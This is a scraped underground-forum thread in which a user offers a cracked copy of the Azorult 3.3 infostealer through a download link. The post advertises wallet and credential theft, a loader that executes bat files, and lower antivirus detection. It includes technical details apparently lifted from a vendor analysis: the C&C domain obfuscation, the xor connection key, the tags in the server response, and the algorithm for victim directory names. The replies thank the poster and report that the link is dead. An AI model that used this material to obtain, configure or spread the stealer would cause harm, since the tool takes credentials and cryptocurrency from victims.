Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 4185

Azorult 3.3 & Cracked (PERSONAL USE ONLY)

by agcash6 - 25 November, 2019 - 05:56 AM
This post is by a banned member (ddosdos1112) - Unhide
16
Posts
0
Threads
4 Years of service
#17
(25 November, 2019 - 05:56 AM)agcash6 Wrote: Show More
Azorult 3.3 & Cracked (PERSONAL USE ONLY)

Azorult v3.3



The above states the following improvements and features:

[+] Added support for stealing the following wallet credentials: BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, Exodus Eden

[+] Cryptocurrency wallet’s stealer component has been improved.

[+] The loader component was fixed and improved, allowing bat files to be loaded and executed with no errors

[+] Lowered AV detection rate, increased successful installation rate

[+] Slight improvement in admin panel’s performance



Comparison to previous versions

In version 3.2, the C&C domain name was xored with a hardcoded key and then encoded with base64. The current version 3.3 shows a new encryption method to obfuscate the domain name. The script for decryption of the domain’s string can be found in the Appendix below.
Every version of Azorult has a unique xor key for its connection method to the C&C. In version 3.3 the connection key is: [0x3, 0x55, 0xae]. Moreover, every version connection message contains a prefix (‘getcfg=’ in version 3.1 and ‘G’ in version 3.2) prepended to the id hash before xoring with the connection key. The prefix in version 3.3 is the connection key, which makes the connection message sent to C&C starts with 3 zero bytes.

Figure 2: adding connection key as prefix.

Azorult’s C&C server response is divided into 3 parts separated by tags:

<c></c> – the configuration part, encoded with base64

<n></n> – DLLs that Azorult copies to a new directory it creates under the %TEMP% folder. The name of the new directory is unique for every version of Azorult (‘1M0’ in version 3.1 and ‘2fda’ in version 3.2). In the new version, the name of the directory is generated based on the id hash of the victim’s computer. Therefore, the name of the directory will be different for every victim.

The algorithm for generating the directory name is as follows:

Id_hash=hash_func(guid)-hash_func(product_name)-hash_func(user_name)- hash_func(computer_name)-hash_func(guid+product_name+user_name+computer_name)

Directory_name = hash_func(hash_func(Id_hash))

The particular implementation of the hash_func method is outlined in a script, which appears in the Appendix below.

<d></d> – names of application paths that Azorult harvests data from. In version 3.3,



DOWNLOAD

Please leave feedback
IF determined anything posted used for malicious purposes, all threads will be deleted and future ones stop.

THANK YOUUU
This post is by a banned member (nexus7101) - Unhide
nexus7101  
Registered
39
Posts
0
Threads
4 Years of service
#18
(This post was last modified: 13 December, 2019 - 08:11 AM by nexus7101.)
thank you sir! +1
edit:
link is currently dead :c.
thank you still for the efforts :)
This post is by a banned member (tempie23) - Unhide
tempie23  
Registered
2
Posts
0
Threads
4 Years of service
#19
Any update to dead link? love to get this
This post is by a banned member (GReenBoxPL8) - Unhide
This post is by a banned member (naranbc) - Unhide
naranbc  
Registered
41
Posts
0
Threads
4 Years of service
#21
thanks 4  sharing bro!! :P
This post is by a banned member (wasingo) - Unhide
wasingo  
Registered
10
Posts
0
Threads
4 Years of service
#22
thanks 4 sharing bro!!

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)